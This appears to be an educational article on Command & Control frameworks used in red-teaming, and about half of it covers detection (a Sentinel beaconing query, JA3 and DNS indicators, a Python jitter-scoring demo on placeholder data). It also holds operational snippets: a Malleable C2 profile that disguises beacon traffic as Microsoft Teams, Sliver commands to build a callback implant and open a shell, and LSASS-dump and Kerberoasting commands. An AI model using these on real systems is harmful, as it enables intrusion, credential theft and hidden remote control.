C2-Framework (Command & Control)
A Command & Control (C2) framework is the tooling red teams and penetration testers use to communicate with and manage compromised hosts after gaining initial access to target systems; real attackers use the same techniques. Well-known frameworks include Cobalt Strike, Metasploit, Sliver, and Havoc. Understanding C2 is essential for defense and detection engineering.
Command & Control (C2) refers to the infrastructure and protocols attackers use to remotely control compromised systems (implants/beacons) after gaining initial access. Red teams use C2 frameworks to simulate realistic APT attacks with the same techniques that real attackers employ.
C2 Architecture - Basic Principle
C2 Architecture (Modern Red Team):
┌─────────────────────┐
│  Red Team Operator  │
│   (Cobalt Strike    │
│    Team Server)     │
└──────────┬──────────┘
           │ HTTPS (Port 443)
           │ encrypted, malleable C2
┌──────────▼──────────┐
│     Redirector      │
│   (Apache/Nginx     │
│    in the cloud)    │
└──────────┬──────────┘
           │ modified HTTP
           │ (looks like CDN traffic)
┌──────────▼──────────┐
│    Compromised      │
│   System (Beacon)   │
│   Victim network    │
└─────────────────────┘
Why Redirectors?
→ A direct Operator→Beacon connection exposes the operator IP, which gets blocked immediately
→ Redirector as a buffer: Operator IP remains hidden
→ Multiple redirectors: Resilience in case of takedown
→ CDN redirectors (Cloudflare): Traffic looks "normal"
Important C2 Frameworks
Cobalt Strike (industry standard for simulated APT):
→ Commercial (~$3,500/year per user)
→ Beacon: small, stable implant
→ Malleable C2 Profiles: Disguise traffic as Teams/Slack/etc.
→ Aggressor Script: Automation, custom workflows
→ Post-Exploitation: Lateral Movement, Credential Harvest
→ Very often abused by real APT groups (cracked versions!)
→ Detection: JA3 fingerprint, Beacon heartbeat pattern
Cobalt Strike Malleable C2 Example (disguised as MS Teams):
set sleeptime "3000";    # Beacon check-in every 3 seconds
set jitter "20";         # ±20% jitter (anti-beaconing detection!)
set useragent "Mozilla/5.0 ... Microsoft Teams";
http-get {
    set uri "/api/v1/user/status";
    client {
        header "Host" "teams.microsoft.com";
        header "Accept" "application/json";
        metadata { base64url; prepend "token="; header "Authorization"; }
    }
}
---
Sliver (Open Source, Go-based):
→ Successor to many private frameworks
→ Implants in Go (difficult for AV to analyze)
→ Protocols: mTLS, WireGuard, HTTP/HTTPS, DNS
→ Multiplayer: Team operation with multiple operators
→ GitHub: BishopFox/sliver
sliver > generate --os windows --arch amd64 \
                  --mtls 10.0.0.1:8888 --save /tmp/beacon.exe
sliver > mtls --lport 8888
sliver > use <session-id>
sliver (IMPLANT) > shell
sliver (IMPLANT) > upload /tmp/tool.exe C:\Windows\Temp\
---
Havoc (Open Source, Widderhorn):
→ Modern C2, released in 2022
→ Daemon (Server) + Implant (Demon.exe)
→ HTTPS listener with custom malleable profile
→ GitHub: HavocFramework/Havoc
---
Metasploit Framework (Pentest Standard):
→ Free (MSF Community) + Pro version
→ Meterpreter: powerful post-exploitation implant
→ Modules: Exploits, Auxiliary, Post, Payloads
→ msf6> use exploit/windows/smb/ms17_010_eternalblue
→ Widely known and signatured, so evasion is poor, but well suited to penetration testing
Post-Exploitation via C2
Typical post-exploitation after C2 establishment:
1. Situational Awareness:
# Cobalt Strike Beacon:
whoami → current user
ipconfig → network information
net localgroup administrators → local admins
netstat -ano → open connections
ps → running processes
2. Credential Access:
→ Mimikatz via C2 (Cobalt Strike inject or execute-assembly)
→ Kerberoasting: Rubeus.exe kerberoast /outfile:hashes.txt
→ LSASS Dump: procdump64.exe -ma lsass.exe lsass.dmp
→ SAM/NTDS dump on domain controller
3. Lateral Movement via C2:
→ Pass-the-Hash: using NTLM hash on other machines
→ Pass-the-Ticket: Kerberos ticket for other services
→ SMB Lateral: PsExec-like via C2 beacon
→ WMI/DCOM: Remote execution without SMB
4. Persistence:
→ Scheduled Task: schtasks /create ...
→ Registry Run Key: HKCU\...\Run\
→ WMI Subscription: persistent trigger
→ COM Hijacking: replace existing COM objects
Hiding C2 communication:
→ Domain Fronting: Traffic runs via CDN (Azure/Cloudflare)
→ DNS over HTTPS: C2 via DoH to own DNS resolver
→ Sleeping/Jitter: Irregular beaconing
→ Process Injection: Code runs in legitimate processes
Detection of C2 Traffic
C2 Detection for Defenders:
1. Beaconing detection:
→ Regular HTTPS connections to external IP
→ Exactly uniform intervals → no jitter → suspicious!
→ SIEM query (Microsoft Sentinel):
DeviceNetworkEvents
| where TimeGenerated > ago(2d) and RemoteIPType == "Public"
| order by DeviceName asc, RemoteIP asc, TimeGenerated asc
| extend SameStream = prev(DeviceName) == DeviceName and prev(RemoteIP) == RemoteIP,
         IntervalSeconds = datetime_diff('second', TimeGenerated, prev(TimeGenerated))
| where SameStream                     // drop the first event of each device/IP stream
| summarize ConnectionCount = count(),
            AvgIntervalSeconds = avg(IntervalSeconds),
            IntervalStdDev = stdev(IntervalSeconds)   // low spread = regular beaconing
    by DeviceName, RemoteIP
| where ConnectionCount > 48           // more than once per hour over 2 days
| order by ConnectionCount desc
2. JA3/JA3S TLS Fingerprinting:
→ Cobalt Strike Standard JA3: 72a7c4f499754a3d7c6bbc3f2b9cfbd1
→ Suricata/Zeek automatically generate JA3
→ Threat Intel: sslbl.abuse.ch/blacklist/ja3_fingerprints/
3. HTTP Header Anomalies:
→ Malleable C2 profiles rarely imitate the real service perfectly, so anomalies remain detectable
→ Host header does not match SNI
→ User-Agent unusual for the endpoint
→ Content-Type does not match the payload
4. DNS indicators:
→ Domain registration < 30 days old
→ Very low TTL (e.g. 60 s) points to fast flux
→ Not in Alexa/Tranco Top 1M
→ High subdomain entropy = DNS tunneling
5. Detect process injection (endpoint):
→ Process opens LSASS memory (PROCESS_ALL_ACCESS)
→ svchost.exe spawns unusual child processes
→ Memory with RWX permissions in non-code areas
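As an added example (not from the original page or any of the frameworks it names), the Python below scores constructed connection records for beaconing as item 1 describes, and shows that the 20% jitter from the Malleable profile above lowers but does not remove the regularity; the host names and RFC 5737 addresses are placeholders.

```python
import random
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed data set modelled on the profile above (sleeptime 3000 ms; jitter
# 0% and 20%) plus one browsing stream. Hosts and RFC 5737 IPs are placeholders.
START = datetime(2024, 1, 1, 9, 0, 0)

def beacon_checkins(device, remote_ip, sleep_ms, jitter_pct, n, seed):
    """n check-ins scheduled like Beacon: each sleep is shortened by a random
    share of 0..jitter_pct percent."""
    rng, t, events = random.Random(seed), START, []
    for _ in range(n):
        events.append((device, remote_ip, t))
        t += timedelta(milliseconds=sleep_ms * (1 - rng.uniform(0, jitter_pct / 100)))
    return events

def browsing(device, remote_ip, n, seed):
    """Irregular human traffic: short bursts and long pauses (constructed)."""
    rng, t, events = random.Random(seed), START, []
    for _ in range(n):
        events.append((device, remote_ip, t))
        t += timedelta(seconds=rng.choice([0.2, 0.5, 1, 4, 30, 120, 600]))
    return events

def beacon_candidates(events, min_count=48, max_cv=0.25):
    """Group by (device, remote_ip) and score each stream by the coefficient of
    variation (stdev/mean) of its inter-arrival gaps: exact intervals give CV 0,
    a 20% uniform jitter about 0.06, human browsing well above 1."""
    streams = defaultdict(list)
    for device, ip, ts in events:
        streams[(device, ip)].append(ts)
    results = {}
    for key, stamps in streams.items():
        if len(stamps) < min_count:
            continue  # apply the SIEM query's volume threshold first
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean, sd = statistics.mean(gaps), statistics.pstdev(gaps)
        cv = sd / mean if mean else 0.0
        results[key] = {"count": len(stamps), "mean_s": round(mean, 2),
                        "cv": round(cv, 3), "beaconing": cv <= max_cv}
    return results

def demo():
    events = (beacon_checkins("WS01", "203.0.113.10", 3000, 0, 100, 1)
              + beacon_checkins("WS02", "203.0.113.20", 3000, 20, 100, 2)
              + browsing("WS03", "198.51.100.5", 100, 3))
    return beacon_candidates(events)
```

Run `demo()` to see the three streams scored; the CV column is what the exact-interval rule in item 1 misses once jitter is on.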